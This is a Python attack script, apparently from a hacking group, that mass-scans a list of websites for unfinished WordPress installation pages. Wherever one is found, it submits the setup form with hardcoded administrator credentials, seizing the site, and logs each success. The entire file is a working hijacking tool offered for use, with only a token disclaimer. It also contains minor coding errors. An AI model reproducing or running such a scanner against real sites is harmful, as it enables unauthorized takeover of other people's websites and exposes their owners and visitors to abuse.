# Recoder : Black_Phish
# Author : Black_Phish
# Team : Ummah Cyber Mujahideen
try:
	import requests
except:
	print(" [+] Command: pip install requests")
import concurrent.futures
r = '\x1b[1;31m'
red = '\x1b[1;31m'
g = '\x1b[1;32m'
b = ''
y = ''
c = ''
w = '\x1b[1;37m'
def rez(url,exploit,n):
	if n == "1":
		print(g+" ["+"+"+"] "+w+url+c+" --> "+red+exploit+g+" Yes!")
	else:
		print(red+" ["+"+"+"] "+w+url+c+" --> "+red+exploit+red+" No!")
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
auth = """{} UMC - Wp Auto Installer{}
  ____  _            _      _____  _     _     _     
 |  _ \| |          | |    |  __ \| |   (_)   | |    
 | |_) | | __ _  ___| | __ | |__) | |__  _ ___| |__  
 |  _ <| |/ _` |/ __| |/ / |  ___/| '_ \| / __| '_ \ 
 | |_) | | (_| | (__|   <  | |    | | | | \__ \ | | |
 |____/|_|\__,_|\___|_|\_\ |_|    |_| |_|_|___/_| |_|
                       ______                        
                      |______|                      
        
    		   Version: 1.0.0

   {} We Don’t Responsible For Any illegal Activists {}
    """.format(r,g,r,g)
def saved(x,y):
	i = x
	i = i.replace("http://","")
	i = i.replace("https://","")
	i = i.replace("www.","")
	i = i.split("/")
	i = i[0]
	try:
		m = open(y,"r").read()
	except:
		open(y,"w")
		m = open(y,"r").read()
	if i in m:
		pass
	else:
		open(y,"a").write(x+"\n")
def Tryinstall(site):
	session = requests.session()
	data = {'weblog_title': 'installed|jex','user_name': 'rm2174714','admin_password': '1337xripon','pass1-text': '1337xripon','admin_password2': '1337xripon','pw_weak': 'on','admin_email': 'rm2174714@gmail.com','Submit': 'Install+WordPress','language': 'en_US'}
	try:
		r = session.post('http://'+site+'/wp-admin/install.php?step=2',data=data,headers=headers,timeout=10).text
		if '<h1>Success!</h1>' in r:
			open('wp-installed.txt','a').write(site+'/wp-login.php#'+'rm2174714','1337xripon'+'\n')
		else:
			open("notinstalled.txt","a").write('http://'+site+'/wp-admin/install.php?step=2')
	except:
		pass
def wpinstall(site):
	dirs = ['/','/wp/','/wp1/','/wp2/','/wordpress/','/test/','/blog/','/install/','/WP/']
	for dir in dirs:
		dork= dir+'wp-admin/install.php'
		try:
			r = requests.get("http://"+site+dork,headers=headers,timeout=10)
			ripon = r.text
			meurl = "http://"+site+"/"+dork
			valid = ripon.lower()
			valid = valid.replace('"','\'')
			rip = "<form" in valid
			rip2 = "type='file'" in valid
			if "<title>WordPress &rsaquo; Installation</title>" in ripon and rip == True:
				rez(st,"Wp-Install","1")
				saved(meurl,"wp-install.txt")
				Tryinstall(site+dir)
				break
			elif '<title>WordPress &rsaquo; Setup Configuration File</title>' in ripon:
				rez(st,"Wp-setup","1")
				saved(meurl,"wp-setup.txt")
				break
			else:
				rez(meurl,"Path","5")
		except Exception as e:
			pass
try:
	print(auth)
	dorks = input(g+" [+] Enter Your SiteList: "+r)
	th = input(g+" [+] How Many Process: "+r)
	dork = open(dorks,"r").read().splitlines()
except Exception as e:
	print(e)
	exit()
try:
	with concurrent.futures.ThreadPoolExecutor(int(th)) as executor:
		executor.map(wpinstall,dork)
except Exception as e:
	print(e)
	
